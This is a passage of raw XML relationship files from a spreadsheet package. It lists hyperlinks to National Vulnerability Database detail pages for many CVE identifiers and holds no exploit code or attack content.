Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80859" TargetMode="External" Id="rId6101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80860" TargetMode="External" Id="rId6102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80861" TargetMode="External" Id="rId6103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80878" TargetMode="External" Id="rId6104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80915" TargetMode="External" Id="rId6105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80916" TargetMode="External" Id="rId6106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80917" TargetMode="External" Id="rId6107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80918" TargetMode="External" Id="rId6108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80919" TargetMode="External" Id="rId6109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80920" TargetMode="External" Id="rId6110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80922" TargetMode="External" Id="rId6111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80923" TargetMode="External" Id="rId6112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80925" TargetMode="External" Id="rId6113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82455" TargetMode="External" Id="rId6114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82514" TargetMode="External" Id="rId6115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86477" TargetMode="External" Id="rId6116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86793" TargetMode="External" Id="rId6117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87469" TargetMode="External" Id="rId6118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87473" TargetMode="External" Id="rId6119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87511" TargetMode="External" Id="rId6120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87595" TargetMode="External" Id="rId6121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87608" TargetMode="External" Id="rId6122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87627" TargetMode="External" Id="rId6123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87804" TargetMode="External" Id="rId6124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9768" TargetMode="External" Id="rId6125" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-4117" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-41352" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14733" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67038" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85046" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-7255" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-37969" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-38352" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31431" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId19" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-4117" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-41352" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14733" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67038" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85046" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-7255" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-37969" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-38352" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31431" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-14498" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14560" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19188" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42043" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45674" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47691" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48056" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48168" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54745" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65956" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70352" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73299" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75754" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77770" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79696" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80098" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83711" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85978" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86152" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87827" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19583" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22797" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47686" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48086" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48765" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51366" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52855" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54680" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55089" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55166" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55565" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55634" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62283" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65818" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65974" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66795" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67401" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68487" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68488" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72733" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72735" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72736" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72738" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72740" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72862" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72863" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72864" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72865" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72867" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72868" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72869" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72872" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72876" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72880" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72882" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72886" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72901" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72902" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72911" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73263" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73268" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73269" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7374" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79748" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89094" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-43716" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-43717" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-42179" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11080" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-22373" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-29296" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-63823" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67066" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70149" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70150" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70152" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70290" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70293" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10196" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13447" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14559" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14563" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16310" 